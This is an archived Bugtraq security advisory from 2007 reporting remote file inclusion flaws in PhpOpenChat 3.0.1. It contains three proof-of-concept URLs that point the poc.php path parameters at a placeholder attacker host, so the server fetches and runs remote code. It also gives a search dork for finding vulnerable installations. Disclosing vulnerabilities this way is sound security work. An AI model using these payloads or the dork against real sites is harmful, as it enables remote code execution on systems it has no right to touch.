[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070410180847.29413.qmail@securityfocus.com>
Date: 10 Apr 2007 18:08:47 -0000
From: seko@...ko.info
To: bugtraq@...urityfocus.com
Subject: PhpOpenChat <= 3.0.1 (poc.php) Multiple Remote File Include
Vulnerabilities
--------------------------------------------------
PhpOpenChat <= 3.0.1 (poc.php) Multiple Remote File Include Vulnerabilities
--------------------------------------------------
Author : SekoMirza
Date Found : Nisan 11 2007
Location : Fransa // ...
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
--------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~
Application : PhpOpenChat
version : 3.0.1
vendor : http://phpopenchat.org/
source url : http://phpopenchat.org/tr.tar.gz?PHPSESSID=3f694b033a2798aac446b05f87e361ce
--------------------------------------------------
Description:
~~~~~~~~
PHPOpenChat is a high performance php-based chat server software for a live chat-room or -module on every php-based site. The first version has been developed for a live-chat-subproject of the main german education portal (DBS) called "SchulWeb". The PHPOpenChat have had to manage alot of users, around 100-150 concurrent chatters, the most behind firewalls and in front of old computers. Based on this experiences, we developed the version 3 of our free chat-server completely new from scratch.
At this time you can integrate this chat software into postnuke, phpbb, yabbse, etc. as a module.
--------------------------------------------------
Vulnerability:
~~~~~~~~~~~
I found vulnerability script in poc.php
Proof Of Concept:
~~~~~~~~~~~~
contrib/phpbb/poc.php?phpbb_root_path=http://attact.com/colok.txt?
contrib/phpbb/poc.php?poc_root_path=http://attact.com/colok.txt?
contrib/phpbb/alternative2/phpBB2_root/poc_loginform.php?phpbb_root_path=http://attact.com/colok.txt?
--------------------------------------------------
google d0rk:
~~~~~~~
"PhpOpenChat"
--------------------------------------------------
Solution:
~~~
- download new version in vendor URL
--------------------------------------------------
Shoutz:
~~
~ My Sweet -> Caramel
~ For Mp3s -> Hypn0sis
~ For Support -> www.starhack.org
~ My Bro -> PhantomOrchid
~ My Preceptor -> Erank Kazno
Powered by blists - more mailing lists